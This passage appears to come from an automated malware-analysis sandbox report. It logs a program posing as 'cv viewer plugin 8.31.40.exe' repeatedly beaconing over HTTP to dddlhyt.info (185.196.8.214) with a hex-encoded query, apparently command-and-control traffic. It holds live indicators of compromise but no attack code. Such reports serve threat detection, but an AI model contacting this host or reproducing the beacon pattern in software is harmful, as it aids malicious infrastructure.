                                                  Aug 31, 2024 22:14:09.147770882 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:10.079664946 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:09 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:14:10.186765909 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:10.434252024 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:10 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:14:10.546132088 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:10.786328077 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:10 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  47192.168.2.949769185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:10.917258024 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:11.611777067 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:11 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  48192.168.2.949770185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:11.739518881 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:12.426371098 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:12 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  49192.168.2.949771185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:12.551911116 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:13.239588976 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:13 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  50192.168.2.949772185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:13.364891052 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:14.047122955 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:13 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:14:14.155745029 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:14.399249077 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:14 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  51192.168.2.949773185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:14.520582914 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:15.206466913 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:15 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  52192.168.2.949774185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:15.334043980 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:16.021977901 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:15 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  53192.168.2.949775185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:16.146169901 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:16.841029882 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:16 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20
                                                  Aug 31, 2024 22:14:16.952352047 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:17.196863890 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:17 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  54192.168.2.949776185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:17.317027092 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:18.002425909 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:17 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  55192.168.2.949777185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:18.129928112 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:18.819413900 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:18 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  56192.168.2.949778185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:18.942416906 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:19.630455017 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:19 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  57192.168.2.949779185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:19.754868031 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:20.472358942 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:20 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  58192.168.2.949780185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:20.630676985 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:21.317787886 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:21 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  59192.168.2.949781185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:21.442254066 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:22.129813910 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:22 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  60192.168.2.949782185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:22.254914999 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:22.966197014 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:22 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  61192.168.2.949783185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:23.082990885 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:23.792293072 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:23 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  62192.168.2.949784185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:23.945274115 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:24.633378029 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:24 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  63192.168.2.949785185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:24.758738995 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:25.443111897 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:25 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  64192.168.2.949786185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:25.570882082 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:26.270853996 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:26 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  65192.168.2.949787185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:26.398819923 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:27.088766098 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:26 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  66192.168.2.949788185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 31, 2024 22:14:27.225629091 CEST323OUTGET /search/?q=67e28dd86b0ba17e400ea81a7c27d78406abdd88be4b12eab517aa5c96bd86ec96834e835a8bbc896c58e713bc90c94c36b5281fc235a925ed3e54d6bd974a95129070b410e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff813c5ee969f39cd68 HTTP/1.1
                                                  Host: dddlhyt.info
                                                  User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                  Aug 31, 2024 22:14:27.915329933 CEST220INHTTP/1.1 200 OK
                                                  Server: nginx/1.20.1
                                                  Date: Sat, 31 Aug 2024 20:14:27 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  X-Powered-By: PHP/7.4.33
                                                  Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: e67b680813008c20


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  67192.168.2.949789185.196.8.214807320C:\Users\user\Desktop\cv viewer plugin 8.31.40.exe
                                                  TimestampBytes transferredDirectionData
